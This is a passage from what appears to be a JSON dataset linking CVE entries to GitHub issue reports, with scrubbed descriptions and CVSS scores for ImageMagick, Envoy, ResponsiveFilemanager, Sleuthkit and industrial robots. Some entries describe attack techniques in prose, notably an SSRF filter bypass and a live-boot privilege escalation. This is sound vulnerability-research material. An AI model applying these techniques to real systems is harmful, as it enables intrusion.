        "Issue_Url_new": "https://github.com/seccomp/libseccomp/issues/139",
        "Repo_new": "seccomp/libseccomp",
        "Issue_Created_At": "2019-02-18T18:32:14Z",
        "description": "BUG: APITAG . Placeholder for a bug, details TBD.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9900",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6434",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6434",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2019-03-29T17:02:25Z",
        "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 8.3,
        "impactScore": 3.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9901",
        "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/6435",
        "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/6435",
        "Repo_new": "envoyproxy/envoy",
        "Issue_Created_At": "2019-03-29T17:03:07Z",
        "description": "Reserved issue for pending security disclosure NUMBERTAG TBA",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 10.0,
        "impactScore": 6.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9915",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1300",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2018-11-12T12:15:27Z",
        "description": "Advisory from Netsparker APITAG Open Redirection. Hello, While testing the Netsparker web application security scanner we identified a Open Redirection vulnerability in APITAG Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed? Please email me at EMAILTAG for the technical details. Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-9927",
        "Issue_Url_old": "https://github.com/careteditor/issues/issues/862",
        "Issue_Url_new": "https://github.com/careteditor/issues/issues/862",
        "Repo_new": "careteditor/issues",
        "Issue_Created_At": "2019-02-21T17:10:10Z",
        "description": "Remote Code Execution . Title: Caret Version NUMBERTAG rc NUMBERTAG is vulnerable to remote code execution. Description: Caret Version NUMBERTAG rc NUMBERTAG allows the execution of arbitrary APITAG and has the ability to start system processes without user interaction. APITAG Code: ERRORTAG APITAG Code (un evaled): ERRORTAG Screenshot: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-9956",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1523",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1523",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-03-22T10:37:33Z",
        "description": "stack buffer overflow in APITAG of ps.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a stack buffer overflow vulnerability in APITAG of ps.c which could lead to code execution. Steps to Reproduce APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG f2]f2 f2 f NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG aa NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ab NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ac NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10212",
        "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/598",
        "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/598",
        "Repo_new": "trippo/responsivefilemanager",
        "Issue_Created_At": "2020-03-05T05:14:14Z",
        "description": "server side request forgery vulnerbility in url uploader bypass CVETAG by adding /favicon.ico to end of php file.. Good afternoon APITAG When i was doing a security test for a client of mine i noticed in your newest version of APITAG NUMBERTAG in NUMBERTAG the url upload is completly broken but it also exist there ) internal server side request forgery by adding to any php APITAG to reproduce this i reccomand to install APITAG NUMBERTAG and not APITAG NUMBERTAG because the url file uploader is completly broken and doesn't work at all even with legit jpeg's, but this version is also vulnerble. you need to have url_upload enabled and run the code on a apache server with default configurations. now send as url > FILETAG when you send that go back to the file manager and you will see a ico. download that file and rename favicon.ico to FILETAG . if you now open that you will see the apache status page. as you can see this is a clear indication that CVETAG is bypassable. how does this work: there are a few problems here. first you only use a regex to verify if it is a allowed url. and in php files ( and sometimes html files ) it is allowed to extend the url. this means if i would go to FILETAG /favicon.ico than the apache server would execute index.php and not APITAG but it would extend the url. secondly i use dns pinning to bypass your miner filter to check if you send localhost because if you do a nslookup on NUMBERTAG ip.io\" you will get: bl4ckh4ck5 APITAG laptop:~/$ nslookup NUMBERTAG ip.io Server NUMBERTAG Address NUMBERTAG Non authoritative answer: Name NUMBERTAG ip.io Address NUMBERTAG and NUMBERTAG is localhost, but this method could also be used to access other ip's in the network. a while back i created a potential patch against SSRF what might help against this problem: URLTAG but i reccomand to make the design client side that the webbrowser downloads the image and than you use a xmlhttprequest to request the normal file upload, because that function isn't vulnerble. i reccomand to fix both problems that url upload works again in NUMBERTAG and that you fix this internal server side request forgery. A CVE is already been requested. Dear ragards, bl4ckh4ck5 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10233",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1829",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1829",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2020-02-14T15:42:50Z",
        "description": "Heap buffer overflow in ntfs_dinode_lookup. Hello sleuthkit team, As part of our fuzzing efforts at Google, we have identified an issue affecting sleuthkit (tested with revision develop APITAG To reproduce, we are attaching a Dockerfile which compiles the project with LLVM, taking advantage of the sanitizers that it offers. More information about how to use the attached Dockerfile can be found here: URLTAG Instructions: ERRORTAG APITAG CODETAG APITAG Alternatively, and depending on the bug, you could use gcc, valgrind or other instrumentation tools to aid in the investigation. The sanitizer error that we encountered is here: ERRORTAG We will gladly work with you so you can successfully confirm and reproduce this issue. Do let us know if you have any feedback surrounding the documentation. Once you have reproduced the issue, we'd appreciate to learn your expected timeline for an update to be released. With any fix, please attribute the report to APITAG Autofuzz project\". We are also pleased to inform you that your project is eligible for inclusion to the OSS Fuzz project, which can provide additional continuous fuzzing, and encourage you to investigate integration options. Don't hesitate to let us know if you have any questions! Google APITAG Team FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10251",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1859",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1859",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2020-03-03T19:01:32Z",
        "description": "out of bounds read in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description An out of bounds read vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image. Steps to Reproduce poc (password: girlelecta): URLTAG cmd: FILETAG convert APITAG FILETAG Upon running this, following crash happens APITAG I enabled page heap on APITAG Microsoft (R) Windows Debugger Version NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG APITAG PATHTAG convert PATHTAG FILETAG Path validation summary Response Time (ms) Location Executable search path is: APITAG NUMBERTAG f NUMBERTAG fb NUMBERTAG image NUMBERTAG f NUMBERTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG ntdll.dll APITAG NUMBERTAG ee NUMBERTAG f NUMBERTAG PATHTAG Page heap: pid APITAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG e NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b5b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG bd NUMBERTAG bec NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG bf NUMBERTAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ab NUMBERTAG bcf NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG df NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG a NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG ca NUMBERTAG caf NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG d7a NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG fb NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b7e NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG ea NUMBERTAG f0 eb NUMBERTAG ec NUMBERTAG ae NUMBERTAG ed NUMBERTAG c0c0 esi NUMBERTAG a NUMBERTAG c NUMBERTAG edi NUMBERTAG eip NUMBERTAG b NUMBERTAG d esp NUMBERTAG f NUMBERTAG ebp NUMBERTAG e NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG fb NUMBERTAG c NUMBERTAG movzx ecx,byte ptr [ecx+eax] ds NUMBERTAG f NUMBERTAG k APITAG APITAG WARNING: Stack unwind information not available. Following frames may be wrong NUMBERTAG f NUMBERTAG dc NUMBERTAG b NUMBERTAG e1 IM_MOD_RL_HEIC NUMBERTAG d ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG f NUMBERTAG f7b NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG e NUMBERTAG f NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG dbfa2 APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG dc3be APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG e APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG db NUMBERTAG d APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG dbaa4 APITAG NUMBERTAG f NUMBERTAG dc NUMBERTAG dbb NUMBERTAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG a NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG APITAG ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG e NUMBERTAG b NUMBERTAG ed NUMBERTAG APITAG NUMBERTAG c NUMBERTAG MSVCR NUMBERTAG malloc NUMBERTAG System Configuration APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-10266",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1487",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1487",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-04-03T14:22:23Z",
        "description": "No integrity checks on UR+ platform artifacts when installed in the robot. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-10267",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1489",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1489",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-04-03T14:28:43Z",
        "description": "Unprotected intelectual property in Universal Robots controller CB NUMBERTAG across firmware versions. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10268",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2550",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2550",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-16T17:22:11Z",
        "description": "Terminate Critical Services. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 5.2,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-10269",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2566",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2566",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:59:00Z",
        "description": "Hardcoded Credentials on APITAG wireless Access Point. yaml id NUMBERTAG title: Hardcoded Credentials on APITAG wireless Access Point type: vulnerability description: One of the wireless interfaces within APITAG APITAG and possibly (according to the vendor) other APITAG fleet vehicles comes pre configured in APITAG Master APITAG Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID APITAG and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in APITAG and APITAG but it might also apply to APITAG APITAG and APITAG cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD, Autentication system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG FILETAG URLTAG flaw: phase: testing specificity: general issue architectural location: Platform code application: All subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Bernhard Dieber APITAG Research), Alias Robotics ( URLTAG detected by method: testing dynamic, web browser. date reported NUMBERTAG reported by: APITAG Robotics ( URLTAG further edited by PATHTAG ctor Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10270",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2557",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2557",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:43:23Z",
        "description": "Hardcoded Credentials on APITAG Control Dashboard. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10271",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2555",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2555",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:34:30Z",
        "description": "APITAG ROS computational graph is exposed to all network interfaces, including poorly secured wireless networks and open wired ones. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10272",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2554",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2554",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:14:56Z",
        "description": "APITAG ROS computational graph presents no authentication mechanisms. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10273",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2560",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2560",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:50:27Z",
        "description": "Unprotected intellectual property in Mobile Industrial Robots APITAG controllers. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10274",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2556",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2556",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:37:32Z",
        "description": "APITAG REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps). ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 4.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10275",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2565",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2565",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:56:18Z",
        "description": "Weak token generation for the REST API.. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10276",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2558",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2558",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:45:55Z",
        "description": "Default credentials on SICK PLC allows disabling safety features. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10277",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2562",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2562",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:52:57Z",
        "description": "Booting from a live image leads to exfiltration of sensible information and privilege escalation. yaml id NUMBERTAG title: Booting from a live image leads to exfiltration of sensible information and privilege escalation type: vulnerability description: There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine. cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: high cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: General Issue architectural location: application specific application: Ubuntu subsystem: N/A package: N/A languages: N/A date detected NUMBERTAG detected by: Lander Usategui, Alfonso Glera APITAG Robotics) detected by method: testing dynamic date reported NUMBERTAG reported by: APITAG Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.4,
        "impactScore": 5.5,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-10278",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2561",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2561",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T04:51:45Z",
        "description": "Unprotected BIOS allows user to boot from live OS image.. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.6,
        "impactScore": 3.6,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-10279",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2569",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2569",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T06:00:50Z",
        "description": "Insecure operating system defaults in APITAG robots. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10280",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2568",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2568",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-24T05:44:10Z",
        "description": "Apache server is vulnerable to a APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10283",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3316",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3316",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-06-30T17:20:40Z",
        "description": "RVD NUMBERTAG No authentication in APITAG protocol. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10285",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3322",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3322",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-07-15T20:55:50Z",
        "description": "Weak authentication implementation make the system vulnerable to a brute force attack over adjacent networks. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-10286",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3323",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3323",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-07-15T21:06:12Z",
        "description": "Mismanaged permission implementation leads to privilege escalation, exfiltration of sensitive information, and APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-10287",
        "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3326",
        "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3326",
        "Repo_new": "aliasrobotics/rvd",
        "Issue_Created_At": "2020-07-15T21:59:00Z",
